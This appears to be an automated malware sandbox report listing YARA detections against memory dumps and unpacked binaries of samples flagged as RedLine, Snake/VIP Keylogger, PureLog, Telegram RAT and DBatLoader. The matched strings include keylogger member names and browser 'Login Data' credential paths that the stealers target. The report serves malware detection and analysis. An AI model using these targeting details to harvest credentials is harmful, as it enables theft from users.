00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35901:$a1: get_encryptedPassword 0x358d5:$a2: get_encryptedUsername 0x35999:$a3: get_timePasswordChanged 0x358b1:$a4: get_passwordField 0x35917:$a5: set_encryptedPassword 0x356e4:$a7: get_logins 0x30d5f:$a10: KeyLoggerEventArgs 0x30d2e:$a11: KeyLoggerEventArgsEventHandler 0x357b8:$a13: _encryptedPassword
0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
0000000E.00000001.1974371913.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000001.2054825787.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
Process Memory Space: npratlsN.pif PID: 4544	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 4544	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 4544	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 4544	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd2231:$a1: get_encryptedPassword 0x100759:$a1: get_encryptedPassword 0x193449:$a1: get_encryptedPassword 0x38d408:$a1: get_encryptedPassword 0xd2205:$a2: get_encryptedUsername 0x10072d:$a2: get_encryptedUsername 0x19341d:$a2: get_encryptedUsername 0x38d3dc:$a2: get_encryptedUsername 0xd22c9:$a3: get_timePasswordChanged 0x1007f1:$a3: get_timePasswordChanged 0x1934e1:$a3: get_timePasswordChanged 0x38d4a0:$a3: get_timePasswordChanged 0xd21e1:$a4: get_passwordField 0x100709:$a4: get_passwordField 0x1933f9:$a4: get_passwordField 0x38d3b8:$a4: get_passwordField 0xd2247:$a5: set_encryptedPassword 0x10076f:$a5: set_encryptedPassword 0x19345f:$a5: set_encryptedPassword 0x38d41e:$a5: set_encryptedPassword 0xd201d:$a7: get_logins
Process Memory Space: npratlsN.pif PID: 3592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 3592	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 3592	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 3592	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x73fe6:$a1: get_encryptedPassword 0x1ab9f5:$a1: get_encryptedPassword 0x26c9b7:$a1: get_encryptedPassword 0x2f1ef6:$a1: get_encryptedPassword 0x73fba:$a2: get_encryptedUsername 0x1ab9c9:$a2: get_encryptedUsername 0x26c98b:$a2: get_encryptedUsername 0x2f1eca:$a2: get_encryptedUsername 0x7407e:$a3: get_timePasswordChanged 0x1aba8d:$a3: get_timePasswordChanged 0x26ca4f:$a3: get_timePasswordChanged 0x2f1f8e:$a3: get_timePasswordChanged 0x73f96:$a4: get_passwordField 0x1ab9a5:$a4: get_passwordField 0x26c967:$a4: get_passwordField 0x2f1ea6:$a4: get_passwordField 0x73ffc:$a5: set_encryptedPassword 0x1aba0b:$a5: set_encryptedPassword 0x26c9cd:$a5: set_encryptedPassword 0x2f1f0c:$a5: set_encryptedPassword 0x73dd2:$a7: get_logins
Process Memory Space: npratlsN.pif PID: 6036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: npratlsN.pif PID: 6036	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: npratlsN.pif PID: 6036	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: npratlsN.pif PID: 6036	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa6e15:$a1: get_encryptedPassword 0xdb0ce:$a1: get_encryptedPassword 0x264376:$a1: get_encryptedPassword 0x2cf306:$a1: get_encryptedPassword 0xa6de9:$a2: get_encryptedUsername 0xdb0a2:$a2: get_encryptedUsername 0x26434a:$a2: get_encryptedUsername 0x2cf2da:$a2: get_encryptedUsername 0xa6ead:$a3: get_timePasswordChanged 0xdb166:$a3: get_timePasswordChanged 0x26440e:$a3: get_timePasswordChanged 0x2cf39e:$a3: get_timePasswordChanged 0xa6dc5:$a4: get_passwordField 0xdb07e:$a4: get_passwordField 0x264326:$a4: get_passwordField 0x2cf2b6:$a4: get_passwordField 0xa6e2b:$a5: set_encryptedPassword 0xdb0e4:$a5: set_encryptedPassword 0x26438c:$a5: set_encryptedPassword 0x2cf31c:$a5: set_encryptedPassword 0xa6c01:$a7: get_logins
Click to see the 104 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.1.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
16.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.npratlsN.pif.2b489a06.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2b489a06.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2b489a06.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2b489a06.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2b489a06.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
10.2.npratlsN.pif.2b489a06.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b489a06.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
4.2.brightness.exe.219233d8.11.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
14.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
4.2.brightness.exe.2274618.2.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
10.2.npratlsN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.Nsltarpn.PIF.20fe67a8.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ccb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d330:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.npratlsN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
16.2.npratlsN.pif.2e310000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
16.2.npratlsN.pif.2e310000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2b48a8ee.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
14.2.npratlsN.pif.23cc0ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.npratlsN.pif.2e310000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
10.2.npratlsN.pif.2dd40000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2dd40000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.npratlsN.pif.2dd40000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2dd40000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2dd40000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.npratlsN.pif.2e490000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.npratlsN.pif.2e490000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.npratlsN.pif.2e490000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.npratlsN.pif.2e490000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.npratlsN.pif.2e490000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.npratlsN.pif.23cc0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.npratlsN.pif.23cc0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
